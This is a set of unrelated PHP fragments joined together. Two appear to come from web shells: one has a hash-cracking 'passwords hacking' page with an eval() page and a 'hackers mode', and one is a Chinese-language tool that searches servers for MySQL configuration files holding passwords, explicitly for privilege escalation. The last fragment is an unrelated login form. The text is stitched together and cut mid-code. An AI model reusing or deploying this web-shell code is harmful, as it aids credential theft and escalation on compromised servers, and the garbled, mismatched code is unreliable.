/** * Passwords "hacking" page * * @return string */ function action_pwd_hck() { $output = '<h1>password lookup</h1>'; if (!function_exists('fsockopen')) { $output .= '<p class="error">Seems like fsockopen function is disabled - without it we cant use this.</p>'; } $output .= '<p>Enter md5/sha1 password hash and we try to "reverse" it to plaintext (You can generate password hashes on ' . html_encode_link('eval() page', self, array('eval' => 1)) . ' or ...)</p>'; $result = ''; if (!empty($_POST)) { $p = $_POST; if (!hack) { $output .= '<p class="error">sorry, "hackers mode" is disabled</p>'; } else { $answer = getpassbyhash($_POST['hash'], $_POST['type']); $result = md5($answer) == $p['hash'] ? 'Password is: <strong>' . $answer . '</strong></p>' : '<p class="error">Password not found :/</p>'; } } else { $p['hash'] = md5('pass'); $p['type'] = 'md5'; } $output .= '<form action="' . self . '" method="post">'; $output .= html_hidden(array('pwd_hck' => 1)); $output .= '<p><input type="text" name="hash" size="42" value="' . $p['hash'] . '"></p>'; $output .= $result; $output .= html_radio('type', array('md5' => 'md5', 'sha1' => 'sha1'), $p['type']); $output .= ' <input type="submit" value="here we go">'; $output .= '</form>'; return $output; }
$bool = true; } else { $bool = false; } do_passreturn($_POST['path'], $_POST['newcode'], "tihuan", $bool, $_POST['oldcode']); } break; case "scanfile": css_js("4"); html_n('<tr><td>此功能可很方便的搜索到保存MYSQL用户密码的配置文件,用于提权.<br>当服务器文件太多时,会影响执行速度,不建议使用目录遍历.<form method="POST" name="sform"><br>'); html_input("text", "path", root_dir, "路径名", "45"); html_input("checkbox", "pass", "", "使用目录遍历", "", true); html_input("text", "code", $_POST['code'], "<br><br>关键字", "40"); html_select(array("--MYSQL配置文件--", "Discuz", "PHPWind", "phpcms", "dedecms", "PHPBB", "wordpress", "sa-blog", "o-blog"), 0, "onchange='return Fulll(options[selectedIndex].value)'"); html_n('<br><br>'); html_radio("搜索文件名", "搜索包含文字", "scanfile", "scancode"); html_input("submit", "passreturn", "搜索"); html_n('</td></tr></form>'); if (!empty($_POST['path'])) { html_n('<tr><td>找到文件:<br><br>'); if (isset($_POST['pass'])) { $bool = true; } else { $bool = false; } do_passreturn($_POST['path'], $_POST['code'], $_POST['return'], $bool); } break; case "scanphp": html_n('<tr><td>原理是根据特征码定义的,请查看代码判断后再进行删除.<form method="POST"><br>'); html_input("text", "path", root_dir, "查找范围", "40");
</div> <div class="form-group"> <label class="sr-only" for="user_pwd">密码:</label> <div class="input-group"> <div class="input-group-addon"><label class="glyphicon glyphicon-lock" for="user_name"></label></div> <input class="form-control" placeholder="密码" type="password" id="user_pwd" name="user_pwd"/> </div> </div> <div class="form-group"> <label class="sr-only">类型</label> <div class="input-group"> <div class="input-group-addon">类型</div> <div class="form-control"> <?php echo html_radio(['student' => "学生", "teacher" => "教师", "admin" => "管理员"], "login_type", req()->post('login_type'), "student", "<label>", " </label>\n"); ?> </div> </div> </div> <div class="form-group text-right"> <button class="btn btn-default" type="submit">登陆</button> </div> </fieldset> </form> </div> </body> </html>